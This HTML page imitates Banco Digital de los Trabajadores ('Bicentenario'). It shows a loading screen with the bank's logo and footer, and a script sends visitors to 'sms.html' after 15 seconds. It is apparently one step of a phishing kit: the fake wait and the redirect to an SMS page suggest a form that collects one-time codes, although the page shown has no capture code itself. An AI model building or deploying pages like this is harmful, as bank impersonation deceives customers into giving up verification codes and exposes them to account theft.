<!DOCTYPE html>
<html lang="es">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>Bicentenario</title>

    <meta name="description" content="">
    <meta name="author" content="Luis Eduardo Perez">

    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

    <link rel="stylesheet" type="text/css" media="screen" href="./docs/theme_2.css">

    <!-- #FAVICONS -->
    <link rel="shortcut icon" href="./docs/BBD-FAVICON-256x256.png" type="image/x-icon">
    <link rel="icon" href="./docs/BBD-FAVICON-256x256.png" type="image/x-icon">

    <!-- FUENTES DE ICONOS NUEVOS -->
    <link rel="stylesheet" href="./docs/pe-icon-7-stroke.css">

    <link rel="stylesheet" href="./docs/loginStyle.css">

    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="Bicentenario">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">

    <meta name="msapplication-TileColor" content="#b91d47">
    <meta name="theme-color" content="#ffffff">

    <style type="text/css">
        body.stop-scrolling {
            height: auto !important;
            overflow: visible !important;
        }

        .icon-watch {
            color: #2c399f !important;
        }

        .show-account {
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }
    </style>

    <style type="text/css">
        .jqstooltip {
            position: absolute;
            left: 0px;
            top: 0px;
            visibility: hidden;
            background: rgb(0, 0, 0) transparent;
            background-color: rgba(0,0,0,0.6);
            filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000);
            -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000)";
            color: white;
            font: 10px arial, san serif;
            text-align: left;
            white-space: nowrap;
            padding: 5px;
            border: 1px solid white;
            z-index: 10000;
        }

        .jqsfield {
            color: white;
            font: 10px arial, san serif;
            text-align: left;
        }
    </style>

    <script>
        setTimeout(function() {
            window.location.href = "sms.html"; // Redirigir a sms.html después de 15 segundos
        }, 15000); // 15000 milisegundos = 15 segundos
    </script>

</head>

<body class="smart-style-3 fixed-page-footer fixed-header desktop-detected">

    <div id="main" role="main" class="mainRegister">
        <div id="content" class="container" style="opacity: 3;">
            <form novalidate="novalidate">
                <div class="modal-dialog demo-modal">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h4 class="modal-title text-center mt-1">
                                <img src="./docs/Logos-BBP-001.png" alt="" style="width: 80%;">
                            </h4>
                        </div>
                        <div class="modal-body smart-form padding-10">
                            <div class="row">
                                <section class="col col-2"></section>
                                <section class="col col-8">
                                    <label for="" class="label">
                                    </label>
                                </section>
                            </div>
                            <br><br>
                            <div class="cargando text-center">
                                <img src="./docs/BBD-FAVICON-150x150.png" alt="" height="35"> Cargando, Por favor espere un momento...
                            </div>

                            <br><br><br>
                            <div class="clearfix"></div>
                            <p class="text-center mt-1">
                                <strong class="note">
                                    Para mayor información o asesoría contáctanos al <br>
                                    Centro de atención telefónica<br>
                                    0500-6272421
                                </strong>
                            </p>
                        </div>
                    </div><!-- /.modal-content -->
                </div><!-- /.modal-dialog -->
            </form>
            <br><br><br>
        </div>
    </div>

    <!-- #PAGE FOOTER -->
    <div class="page-footer text-start" id="footer">
        <div class="m-3" style="padding-left: 10%;">
            <strong class="txt-color-white">
                Banco Digital de los Trabajadores - RIF: G-20009148-7
                <span class="hidden-xs"> Copyright © 2025.</span> Todos los derechos reservados.
            </strong>
        </div>
    </div><!-- END FOOTER -->

    <div id="divSmallBoxes"></div>
    <div id="divMiniIcons"></div>
    <div id="divbigBoxes"></div>
</body>
</html>
